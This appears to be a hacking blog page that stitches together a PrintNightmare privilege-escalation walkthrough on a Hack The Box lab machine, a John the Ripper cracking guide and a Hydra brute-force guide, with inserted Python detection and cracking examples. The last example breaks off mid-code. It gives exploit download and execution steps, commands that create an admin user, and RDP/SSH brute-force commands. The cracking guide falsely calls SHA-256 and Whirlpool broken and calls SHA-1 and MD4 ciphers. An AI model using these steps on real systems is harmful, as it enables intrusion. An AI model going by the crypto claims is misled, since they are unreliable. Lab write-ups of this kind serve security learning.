PrintNightmare Privilege Escalation

Hello world, welcome to Haxez. In this post, I’m going to be demonstrating how to perform the PrintNightmare privilege escalation exploit. I will be using Evil-WinRM and the CVE-2021-1675.ps1 script by Caleb Stewart on GitHub. I’ve just completed the retired easy Hack The Box machine Driver and was blown away by this vulnerability. It’s easy to see why it is such a serious vulnerability.

What Is PrintNightmare?

The vulnerability exists because the Spooler service does not properly validate the driver when it is installed on a system. This can allow an attacker to install a malicious driver. Once installed, an attacker can exploit the vulnerability in the Print Spooler service to execute arbitrary code with system-level privileges.

This vulnerability can be exploited even if the user account used to install the driver has limited privileges. This is because the Print Spooler service runs with system-level privileges. This means that it has the ability to install and execute drivers with elevated privileges.

To mitigate the risk of exploitation, it is important to apply the appropriate patches and updates provided by Microsoft. Additionally, other measures such as restricting access to the Spooler service, or disabling it entirely on systems that do not need to print, further reduce exposure.

The Scenario

A threat actor has obtained network access and a domain user’s credentials whether through phishing or some other social engineering attack. They can check the spooler service on the target host via the ‘impacket-rpcdump’ tool. If the following protocol is included in the output then it could be a good candidate for the exploit.

┌──(kali㉿kali)-[~/Driver/scripts]
└─$ impacket-rpcdump @10.129.95.238               
--snip--
Protocol: [MS-RPRN]: Print System Remote Protocol 
Provider: spoolsv.exe 
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0 
Bindings: 
          ncacn_ip_tcp:10.129.95.238[49410]
          ncalrpc:[LRPC-188127abacea381ad9]
--snip--
PrintNightmare impacket-rpcdump
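As an added example (not part of the original post and not code from impacket), here is a small Python parser over the rpcdump output format shown above. A defender can run it across a fleet's rpcdump results to inventory which hosts still expose the spooler interface (the MS-RPRN UUID from the output above) over TCP, which is exactly the check the scenario describes from the attacker's side. The sample text is constructed from the format above; the addresses and the first UUID are placeholders, not real endpoints.

```python
"""Parse impacket-rpcdump output and list hosts that expose the Print Spooler
(MS-RPRN) interface over TCP.  Added example, not part of impacket."""
import re
from dataclasses import dataclass, field

# UUID of the Print System Remote Protocol interface, as shown in the rpcdump output.
MS_RPRN_UUID = "12345678-1234-ABCD-EF00-0123456789AB"

# Constructed sample in rpcdump's layout; addresses and the first UUID are placeholders.
SAMPLE = """\
Protocol: N/A
Provider: N/A
UUID    : 00000000-0000-0000-0000-000000000001 v1.0
Bindings:
          ncacn_ip_tcp:192.0.2.10[49664]

Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
          ncacn_ip_tcp:192.0.2.10[49410]
          ncalrpc:[LRPC-placeholder]
"""


@dataclass
class RpcEndpoint:
    protocol: str
    provider: str = ""
    uuid: str = ""
    bindings: list = field(default_factory=list)


def parse_rpcdump(text):
    """Split rpcdump output into one record per Protocol/Provider/UUID/Bindings block."""
    endpoints = []
    current = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("Protocol:"):
            current = RpcEndpoint(protocol=stripped.split(":", 1)[1].strip())
            endpoints.append(current)
        elif current is None:
            continue  # text before the first block (e.g. banner or --snip--)
        elif stripped.startswith("Provider:"):
            current.provider = stripped.split(":", 1)[1].strip()
        elif stripped.startswith("UUID"):
            # "UUID    : <uuid> v1.0" -> keep only the UUID, normalised to upper case
            m = re.search(r"([0-9A-Fa-f-]{36})", stripped)
            if m:
                current.uuid = m.group(1).upper()
        elif stripped.startswith("ncacn_") or stripped.startswith("ncalrpc:"):
            current.bindings.append(stripped)
    return endpoints


def spooler_tcp_bindings(endpoints):
    """Return the ncacn_ip_tcp bindings that belong to the MS-RPRN interface.
    A non-empty result means the spooler is reachable over the network."""
    return [
        b
        for e in endpoints
        if e.uuid == MS_RPRN_UUID
        for b in e.bindings
        if b.startswith("ncacn_ip_tcp:")
    ]


if __name__ == "__main__":
    for binding in spooler_tcp_bindings(parse_rpcdump(SAMPLE)):
        print("spooler exposed on", binding)
```

Feed it real rpcdump output instead of SAMPLE and an empty result is what you want to see on hosts where the spooler has been disabled.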

The PrintNightmare Payload

In order to leverage this vulnerability to elevate privileges, we first need a payload to exploit it. Such an exploit is publicly available on GitHub right now at the following URL https://github.com/calebstewart/CVE-2021-1675. We can use wget on our attack box to download this payload and store it in our scripts directory.

┌──(kali㉿kali)-[~/Driver/scripts]
└─$ wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
--2023-03-17 18:04:25--  https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 2606:50c0:8000::154, 2606:50c0:8001::154, 2606:50c0:8002::154, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8000::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8001::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8002::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8003::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 178561 (174K) [text/plain]
Saving to: ‘CVE-2021-1675.ps1.1’

CVE-2021-1675.ps1.1                     100%[============================================================================>] 174.38K  --.-KB/s    in 0.03s   
2023-03-17 18:04:26 (4.96 MB/s) - ‘CVE-2021-1675.ps1.1’ saved [178561/178561]
Wget CVE-2021-1675

The Foothold

We will need user credentials in order to perform this exploit. These could be obtained through many nefarious methods but I will leave that to your imagination. Once we have the credentials, we can connect to the box via the Evil-WinRM tool. As you can see from the output below, I’m connecting to the target host with the user tony. Furthermore, the password for tony’s account is ‘liltony’. I’ve specified the target IP address with the ‘-i’ flag and I’ve also specified my script directory with the ‘-s’ flag.

┌──(kali㉿kali)-[~/Driver]
└─$ evil-winrm -i 10.129.95.238 -u 'tony' -p 'liltony' -s /home/kali/Driver/scripts/
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents> menu

   ,.   (   .      )               "            ,.   (   .      )       .   
  ("  (  )  )'     ,'             (     '    ("     )  )'     ,'   .  ,)  
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((   
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')  
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \  
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \ 
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /
        \/                               \/          \/       \/         \/

       By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Dll-Loader 
[+] Donut-Loader 
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit
PrintNightmare Evil-WinRM

The Exploit

We can now load the script that we saved to our script directory earlier by typing the script name (CVE-2021-1675.ps1). This will then load additional options into Evil-WinRM including the ability to ‘Invoke-Nightmare’. Typing ‘Invoke-Nightmare’ will then generate a new payload that will create a new user and add the user as a local administrator.

*Evil-WinRM* PS C:\Users\tony\Documents> CVE-2021-1675.ps1
*Evil-WinRM* PS C:\Users\tony\Documents> menu

   ,.   (   .      )               "            ,.   (   .      )       .   
  ("  (  )  )'     ,'             (     '    ("     )  )'     ,'   .  ,)  
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((   
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')  
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \  
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \ 
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /
        \/                               \/          \/       \/         \/

       By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Add-Win32Type 
[+] Dll-Loader 
[+] Donut-Loader 
[+] field 
[+] func 
[+] get_nightmare_dll 
[+] Invoke-Binary 
[+] Invoke-Nightmare 
[+] New-InMemoryModule 
[+] psenum 
[+] struct
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit

*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user  as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
PrintNightmare Invoke-Nightmare
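The output above shows the footprint this leaves on the host: a new local user is created and then added to the local Administrators group within about a second. As an added example (not part of the original post, the exploit script, or any Microsoft tooling), the Python below correlates Windows Security events 4720 (user account created) and 4732 (member added to a security-enabled local group) to flag exactly that pattern. The event records are constructed dictionaries standing in for parsed log entries; the group SID S-1-5-32-544 is the BUILTIN\Administrators SID shown later in this post, and the 60-second window and the HOST$ machine-account name are assumptions.

```python
"""Flag a local account that is created (event 4720) and added to Administrators
(event 4732) within a short window, the trace Invoke-Nightmare leaves behind.
Added example; events below are constructed, not real log records."""
from datetime import datetime

ADMINISTRATORS_SID = "S-1-5-32-544"  # BUILTIN\Administrators

# Constructed sample records.  In a real pipeline these come from the 4720/4732
# EVTX fields (SubjectUserName, TargetUserName, TargetSid).  "HOST$" stands in for
# the machine account a SYSTEM-level service (like the spooler) acts as.
EVENTS = [
    {"id": 4624, "time": "2023-03-17T18:10:02", "subject": "tony", "target": "tony"},
    {"id": 4720, "time": "2023-03-17T18:12:40", "subject": "HOST$", "target": "adm1n"},
    {"id": 4732, "time": "2023-03-17T18:12:41", "subject": "HOST$", "target": "adm1n",
     "group_sid": ADMINISTRATORS_SID},
    # A helpdesk-style change hours apart should not fire.
    {"id": 4720, "time": "2023-03-17T09:00:00", "subject": "helpdesk", "target": "newhire"},
    {"id": 4732, "time": "2023-03-17T15:30:00", "subject": "helpdesk", "target": "newhire",
     "group_sid": ADMINISTRATORS_SID},
]


def _ts(value):
    return datetime.fromisoformat(value)


def find_fast_admin_creation(events, window_seconds=60):
    """Return (account, seconds_between, subject) for every 4732 into Administrators
    whose member account was created by a 4720 at most window_seconds earlier.
    The subject is returned because a machine/SYSTEM account doing this is a
    second strong signal that a service, not a person, made the change."""
    created = {}  # account -> time of its 4720
    hits = []
    for ev in sorted(events, key=lambda e: _ts(e["time"])):
        if ev["id"] == 4720:
            created[ev["target"]] = _ts(ev["time"])
        elif ev["id"] == 4732 and ev.get("group_sid") == ADMINISTRATORS_SID:
            t0 = created.get(ev["target"])
            if t0 is None:
                continue
            gap = (_ts(ev["time"]) - t0).total_seconds()
            if 0 <= gap <= window_seconds:
                hits.append((ev["target"], gap, ev["subject"]))
    return hits


if __name__ == "__main__":
    for account, gap, subject in find_fast_admin_creation(EVENTS):
        print(f"{account} became local admin {gap:.0f}s after creation (by {subject})")
```

Both event IDs only appear if success auditing for "User Account Management" and "Security Group Management" is enabled on the host, so check the audit policy before relying on this.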

The Consequence

We are now able to remote into the target system with the new user. As you can see from the output below, the new user is a member of the local Administrators group. From here we could install persistence or perform an LSA dump to dump credentials from memory. If a Domain Administrator has logged in to this system then it would be game over for the domain controller.

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.129.95.238 -u 'adm1n' -p 'P@ssw0rd' -s /home/kali/Driver/scripts/
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adm1n\Documents> net localgroup
net.exe : System error 1312 has occurred.
    + CategoryInfo          : NotSpecified: (System error 1312 has occurred.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
A specified logon session does not exist. It may already have been terminated.
*Evil-WinRM* PS C:\Users\adm1n\Documents> whoami /groups

GROUP INFORMATION
-----------------
Group Name                                                    Type             SID          Attributes
============================================================= ================ 
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                                          Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level                          Label            S-1-16-12288
*Evil-WinRM* PS C:\Users\adm1n\Documents> 
Game Over

PrintNightmare Conclusion

I know that this is an old vulnerability but I recently stumbled on a box that let me pull it off. I thought it was fascinating and was blown away by how simple it was. Granted, that’s down to the developers of the exploit and the developers of Evil-WinRM. However, if I can pull off an exploit like this then anybody can. All it takes is a few misconfigured permissions and the whole domain is at risk. Anyway, I wanted to write a post about it because I thought it was a cool exploit.

Hacking Tools: John The Ripper

Hello World and welcome to HaXez, the game’s afoot and in this post, I’m going to be talking about my favorite password-cracking tool, John The Ripper. John the Ripper is a multi-platform password cracking tool that can crack various password hashes. It was developed by OpenWall and was initially released in 1996. I believe John The Ripper got its name from another hacking tool called Jack The Cracker, or Cracker Jack. Anyway, you’re not here to read a reworded Wikipedia article.

Installing John The Ripper

John The Ripper should come preinstalled on most penetration testing Linux distributions. However, your package manager may have it if your distribution didn’t come with it preinstalled. For Debian-based distributions you can run:

sudo apt-get install john
Installing John The Ripper

If your package manager’s repositories don’t have John then you can install it from GitHub by using Git Clone. Then once it’s installed you can view the documentation by either running john -h or by looking at the man pages.

John The Ripper Features

As mentioned, John can crack a variety of different password hashes. You can see exactly which hashes he can crack by running the list formats command. This command is also helpful when trying to manually specify a hash type. If you’re in an exam and have forgotten how to ask John to crack a raw MD5 hash, then this command could help.

sudo john --list=formats
John The Ripper List Formats

The functionality doesn’t end with mere password cracking though. John has a variety of tools to aid you in the heinous slaughtering of innocent password hashes. These additional tools can normally be found in your /usr/bin or /opt/john/src/ directories. Furthermore, these tools can be used for things like extracting hashes from password-protected ZIP or RAR archives.

Additional John Tools

John The Ripper Cracking Modes

John has a number of different password hash cracking modes. These various modes can be used to crack password hashes in different ways. If one method of cracking a password hash didn’t work, then you could try a different mode.

Wordlist Mode

By far the most common mode I’ve used is the wordlist mode. This mode requires the user to specify a wordlist. This wordlist could be bespoke and created by tools like Crunch. Or it could be one of the many wordlists available on the internet. John will then go through the list line by line attempting to match the hash to the word. This mode also offers a mangle option where it will apply rules to the word. In short, the word password could be automatically mangled to something like P@55W0RD.

Single Crack Mode

As stated on the Openwall (John Developers) website, the single crack mode is the cracking mode you should start with. It will use login names, full names, and user home directory names as candidate passwords. It will then apply a large set of mangling rules. Successfully cracked passwords will also be tried against any other hashes that have been loaded. In theory, this mode should be able to crack a list of password hashes faster than if you were to supply the hashes separately.

Incremental Mode

This mode will try all possible character combinations. This is a powerful mode but would likely take longer than using a wordlist. If it tries all possible character combinations then it would eventually guess the correct password. If you know the length of the password then you can specify it to make cracking quicker. However, if you don’t know the length of the password and the password is a fairly long and complex one, then you could be waiting a while… like forever.

External Mode

From what I’ve read and what I understand, I believe this mode requires you to create your own cracking mode. The program code is a subset of C and would be compiled by John at startup. This could be useful if the hashing algorithm used to create the hash is bespoke. You could then write your own cracking module and load it into john to crack those custom-created hashes.

Identifying Hashes

John The Ripper will automatically attempt to identify the hashes that you give him. However, this can be prone to error. Fortunately, there are plenty of tools out there that you can use to identify password hash types. One such tool is hash-identifier which will come preinstalled or should be installable via your package manager or via cloning it from GitHub. To run the tool you simply type the name and then it will ask you to submit your hash. It will then spit out a list of hash types in the order of likelihood. Then you can use that information to manually tell John what type of hash you want to crack.

Hash Identifier
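As an added example (my own code for this post, not hash-identifier's or John's), here is the kind of guess hash-identifier makes, written out in Python: a crypt-style prefix pins the algorithm, while a bare hex digest only tells you the output size, so several formats share one length and you may need to try more than one. It also splits a mixed hash file into per-format groups, since John wants one --format per run. The format names are John's; the ordering of candidates is my assumption of likelihood, and the sample lines are constructed (the MD5 and SHA1 values are the digests of "password", the sha512crypt line is a placeholder of the right shape).

```python
"""Guess John format names for a hash from its prefix, length and alphabet, and
group a hash file by format.  Added example, not hash-identifier's logic."""
import re

# crypt(3)-style prefixes carry the algorithm id, so they are unambiguous.
PREFIXES = {
    "$1$": ["md5crypt"],
    "$5$": ["sha256crypt"],
    "$6$": ["sha512crypt"],
    "$2a$": ["bcrypt"],
    "$2b$": ["bcrypt"],
    "$2y$": ["bcrypt"],
}

# Bare hex digests only reveal the output size; order is my guess at likelihood.
HEX_LENGTHS = {
    32: ["raw-md5", "raw-md4", "NT"],
    40: ["raw-sha1"],
    64: ["raw-sha256"],
    128: ["raw-sha512", "whirlpool"],
}

# Constructed sample file: "user:hash" and bare-hash lines, plus a comment.
SAMPLE_LINES = [
    "tony:5f4dcc3b5aa765d61d8327deb882cf99",            # md5("password")
    "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8",         # sha1("password"), no user field
    "root:$6$saltsalt$PLACEHOLDER-NOT-A-REAL-HASH",     # sha512crypt-shaped placeholder
    "# comment line",
]


def identify(hash_string):
    """Return candidate John --format names, most likely first; [] if nothing fits."""
    h = hash_string.strip()
    for prefix, names in PREFIXES.items():
        if h.startswith(prefix):
            return list(names)
    if re.fullmatch(r"[0-9a-fA-F]+", h):
        return list(HEX_LENGTHS.get(len(h), []))
    return []


def hash_field(line):
    """John accepts 'user:hash'; crypt hashes contain '$' but no ':', so the last
    colon-separated field is always the hash."""
    return line.rsplit(":", 1)[-1] if ":" in line else line


def split_by_format(lines):
    """Group input lines by their most likely format so each group can be cracked
    with a single --format=... run.  Unrecognised lines land under 'unknown'."""
    groups = {}
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        candidates = identify(hash_field(line))
        key = candidates[0] if candidates else "unknown"
        groups.setdefault(key, []).append(line)
    return groups


if __name__ == "__main__":
    for fmt, members in split_by_format(SAMPLE_LINES).items():
        print(f"--format={fmt}: {len(members)} hash(es); alternatives: "
              f"{identify(hash_field(members[0]))[1:] or 'none'}")
```

When the first guess fails to load or cracks nothing, the remaining candidates from identify() are the next --format values to try.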

Getting Wordlists

A question I get asked a lot is where I get my word list from. Well, there are many locations. Most penetration distributions come with a wordlist preinstalled. However, you can download them from the internet. One particular wordlist that I would like to shine a light on is seclists. Seclists is available from GitHub and has almost every type of wordlist you could ever want. For the purposes of this demonstration, I will be using the rockyou.txt wordlist from the rockyou.com data breach.

Seclists

Cracking MD5 Hashes With John The Ripper

As mentioned earlier, John can crack a variety of password hashes. The example below shows how you can crack an MD5 hash. MD5, the MD5 message-digest algorithm, is cryptographically broken but still commonly used; it produces a 128-bit hash value. MD5 was originally designed by Ronald Rivest in 1991 to replace MD4. I used the following syntax to crack the MD5 hash.

sudo john --format=raw-md5 --wordlist=rockyou.txt hash1.txt
John The Ripper Crack MD5 Hash

Cracking SHA1 Hashes With John The Ripper

The next hash that somehow managed to sneak its way into my directory is a SHA1 hash. SHA1 is a cryptographically broken encryption cipher that was originally designed by the National Security Agency. It was initially released in 1993 and produces a 160-bit hash. The following syntax shows how you can crack a SHA1 hash.

sudo john --format=raw-sha1 --wordlist=rockyou.txt hash2.txt
Cracking SHA1 Hashes With John The Ripper

Cracking SHA256 Hashes With John The Ripper

Where did this hash come from? Never mind, I’m sure our friend John can dispatch it fairly quickly. SHA256 is another cryptographically broken hashing algorithm that was developed by the National Security Agency (it’s almost as if they were designing them to fail).

sudo john --format=raw-sha256 --wordlist=rockyou.txt hash4.txt
Cracking SHA256 Hashes With John The Ripper

Cracking Whirlpool Hashes With John The Ripper

What’s that? No secret is safe? Well, if you use a crappy password and someone is able to obtain your password hash then you aren’t far from the truth. Have you considered doing a password audit of your employees’ passwords to ensure they are secure? Maybe now is a good time. The syntax below shows how you can crack Whirlpool hashes. Whirlpool is a broken cryptographic algorithm designed by Vincent Rijmen and was first published in 2000.

sudo john --format=whirlpool --wordlist=rockyou.txt hash4.txt
Cracking Whirlpool Hashes With John The Ripper

Cracking MD4 Hashes With John The Ripper

MD4 hashes are outdated but you would be surprised to see how many organizations still use broken and outdated cryptographic algorithms. MD4 is a cryptographically broken encryption cipher originally developed by Ronald Rivest and first published in 1990. The syntax below shows you how to crack passwords hashed with the MD4 algorithm.

sudo john --format=raw-md4 --wordlist=rockyou.txt hash5.txt
Cracking MD4 Hashes With John The Ripper
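The cracking-modes section and the per-format sections above describe the same loop from two angles: generate candidates (from a wordlist plus mangling rules, from the login names, or exhaustively), hash each one with the right algorithm, compare. As an added example that serves both passages (my own Python for this post, not John's code), here is a miniature of the three modes against the raw formats used in this post. The rule set is a small constructed one whose leetspeak-plus-uppercase rule turns "password" into "P@55W0RD" as the wordlist section describes; the sample users and hashes are constructed, and raw-md4/whirlpool only work when the OpenSSL behind hashlib still provides them, which is why available() exists.

```python
"""A miniature of John's wordlist, single and incremental modes against the raw
hash formats used in this post.  Added example; not John's code, and the rule
set and sample data are constructed."""
import hashlib
import itertools

# John format name -> hashlib algorithm name.  md4 and whirlpool are present only
# when the OpenSSL build behind hashlib still ships them (legacy provider).
FORMATS = {
    "raw-md5": "md5", "raw-sha1": "sha1", "raw-sha256": "sha256",
    "raw-md4": "md4", "whirlpool": "whirlpool",
}


def available(fmt):
    """True if this Python/OpenSSL build can compute the given John format."""
    try:
        hashlib.new(FORMATS[fmt])
        return True
    except ValueError:
        return False


def digest(fmt, candidate):
    return hashlib.new(FORMATS[fmt], candidate.encode()).hexdigest()


def rules(word):
    """A handful of mangling rules in the spirit of John's wordlist rules.
    'password' -> ..., 'p@55w0rd', 'P@55W0RD', ..., 'password123', ..."""
    leet = word.translate(str.maketrans("aeios", "@3105"))
    out = []
    for cand in (word, word.capitalize(), word.upper(), leet, leet.upper(),
                 leet.capitalize(), word + "1", word + "123", word + "!"):
        if cand not in out:
            out.append(cand)
    return out


def wordlist_mode(fmt, targets, wordlist):
    """targets: set of hex hashes.  Each wordlist entry and its mangled variants is
    hashed and compared; returns {hash: plaintext} for every hash that matched."""
    found = {}
    for word in wordlist:
        for cand in rules(word):
            h = digest(fmt, cand)
            if h in targets and h not in found:
                found[h] = cand
        if len(found) == len(targets):
            break  # everything loaded is cracked; stop early like John does
    return found


def single_mode(fmt, users):
    """users: {login: hash}.  Candidates are built from the login names themselves
    (John also uses GECOS and home-directory names) and every candidate is tried
    against all loaded hashes, so one user's weak choice can unlock another's."""
    found = wordlist_mode(fmt, set(users.values()), list(users))
    return {login: found[h] for login, h in users.items() if h in found}


def incremental_mode(fmt, targets, charset="abcdefghijklmnopqrstuvwxyz0123456789", max_len=4):
    """Exhaustive search over all strings of length 1..max_len.  Cost grows as
    len(charset)**max_len, which is why this is the mode of last resort."""
    found = {}
    for length in range(1, max_len + 1):
        for tup in itertools.product(charset, repeat=length):
            cand = "".join(tup)
            h = digest(fmt, cand)
            if h in targets and h not in found:
                found[h] = cand
                if len(found) == len(targets):
                    return found
    return found


if __name__ == "__main__":
    # Constructed audit data: two local accounts with weak, related passwords.
    users = {"tony": digest("raw-sha1", "Tony"), "bob": digest("raw-sha1", "tony123")}
    print("single mode:", single_mode("raw-sha1", users))
    target = digest("raw-md5", "P@55W0RD")
    print("wordlist mode:", wordlist_mode("raw-md5", {target}, ["letmein", "password"]))
```

Even this toy shows why the post recommends single mode first: the candidate set is tiny and derived from data you already have, whereas incremental mode is a brute-force loop whose running time is set by the character set and length, not by your cleverness.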

John.pot

Did I just rickroll you via password hashes? Well yeah, I did, and I refuse to apologize. This post took me a day to write up and unfortunately you have to deal with the consequences. So, what happens to all the password hashes that get cracked by john? Well, they get stored in a file called john.pot. You can use locate on your system to find this but it is usually located in /root/.john/john.pot. If you’re trying to crack a hash but are getting an error message then it is likely you have already cracked it. Delete the john.pot file or remove the line with the cracked hash in order to re-crack it.

sudo cat /root/.john/john.pot
John.pot

Conclusions

John The Ripper is a fantastic tool that is near and dear to my heart. Yes, there are alternatives such as Hashcat but this is a mainstay of cybersecurity. It does what it needs to do and provides a simple way of doing it. It is one of my favorite tools for hacking and I will continue using it until it is no longer feasible to do so. I realize I have only scraped the surface on the functionality of John The Ripper but this post isn’t meant for advanced usage, it is merely a guide on how to get started with John The Ripper. So get slaying and let me know how you get on.

Hacking Tools: Hydra

Hello World and welcome to HaXeZ, today we’re talking about the brute forcing tool THC Hydra. According to Wikipedia, Hydra is a parallelized network logon cracker. It is available on a number of Penetration Testing Linux distributions such as Kali Linux, Parrot OS, Black Arch, and BackBox. Hydra has the ability to perform attacks against various different network services including Remote Desktop, Secure Shell, and many others. It is also capable of performing brute force attacks against web applications.

Installing Hydra

Hydra tends to come preinstalled on most penetration testing distributions. However, it can also be installed using apt. If your repositories don’t have Hydra for whatever reason then it can easily be installed from GitHub using git clone.

Installing Hydra

Hydra For Brute Forcing RDP

Remote Desktop Protocol or RDP is a remote management tool primarily used in Windows environments. It uses terminal services to allow users to connect to the target host using the RDP Client. The user will then be presented with a visual representation of the desktop. Furthermore, this will allow them to carry out management tasks. RDP is often attacked by hackers using automated tools like Hydra. Please see below for the syntax on how to attack RDP. The uppercase L specifies the user wordlist, the uppercase P specifies the password wordlist. The lowercase variants will allow you to specify individual words. The -F flag tells Hydra to stop once it has found a correct password. Then we specify the protocol, the IP address, and the verbosity.

sudo hydra -L usernames.txt -P passwords.txt -F rdp://10.0.2.5 -V
Hydra Brute Forcing RDP

Brute Forcing SSH

SSH or Secure Shell is another remote management protocol. It is found in Linux or Unix environments but has recently been added to Windows. Furthermore, it is considered the successor to telnet. Telnet doesn’t use encryption so everything is transmitted in plaintext. If a threat actor were on your network performing a man-in-the-middle attack, they would be able to see your username and password transmitted to the telnet server. SSH is an encrypted protocol so if traffic was intercepted, it couldn’t be read. You can perform brute force attacks against SSH like so:

sudo hydra -L username.txt -P passwords.txt -F ssh://10.0.2.5 -V
Brute Forcing SSH
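From the other side of the wire, a Hydra run like the one above is loud: every attempt from the user list times the password list lands in the server's auth log, and the -F flag means the noise ends with one success. As an added example (my own Python for this post, not part of Hydra or OpenSSH), here is a detector over sshd log lines that raises one alert when a source exceeds a failure threshold inside a sliding window, and a second, higher-priority one when a login from that same source then succeeds while the window is still hot. The log lines are constructed in sshd's normal "Failed/Accepted password for ..." wording; the threshold, window and addresses are assumptions.

```python
"""Spot password-guessing bursts and a guess that succeeded, from sshd log lines.
Added example; the sample log is constructed, not captured."""
import re
from collections import defaultdict, deque
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)

# Constructed sample: one legitimate typo from 192.0.2.7, then a guessing burst
# from 192.0.2.99 that ends in a successful login as tony.
SAMPLE_LOG = """\
Mar 17 18:19:50 web01 sshd[2201]: Failed password for tony from 192.0.2.7 port 51000 ssh2
Mar 17 18:20:01 web01 sshd[2210]: Failed password for invalid user admin from 192.0.2.99 port 41234 ssh2
Mar 17 18:20:02 web01 sshd[2211]: Failed password for invalid user test from 192.0.2.99 port 41235 ssh2
Mar 17 18:20:03 web01 sshd[2212]: Failed password for root from 192.0.2.99 port 41236 ssh2
Mar 17 18:20:04 web01 sshd[2213]: Failed password for tony from 192.0.2.99 port 41237 ssh2
Mar 17 18:20:05 web01 sshd[2214]: Failed password for tony from 192.0.2.99 port 41238 ssh2
Mar 17 18:20:06 web01 sshd[2215]: Failed password for tony from 192.0.2.99 port 41239 ssh2
Mar 17 18:20:07 web01 sshd[2216]: Accepted password for tony from 192.0.2.99 port 41240 ssh2
""".splitlines()


def parse(line):
    """Return {'ts', 'ok', 'user', 'ip'} for an auth line, or None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Syslog timestamps carry no year; deltas within one year are what we need.
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
    return {"ts": ts, "ok": m["result"] == "Accepted", "user": m["user"], "ip": m["ip"]}


def detect(lines, threshold=5, window=60):
    """Alerts: ('burst', ip, count) the first time a source reaches `threshold`
    failures inside `window` seconds, and ('success-after-burst', ip, user) when
    a login from that source succeeds while its failure window is still hot."""
    recent = defaultdict(deque)  # ip -> timestamps of failures inside the window
    alerted = set()
    alerts = []
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        q = recent[ev["ip"]]
        while q and (ev["ts"] - q[0]).total_seconds() > window:
            q.popleft()  # slide the window forward
        if ev["ok"]:
            if len(q) >= threshold:
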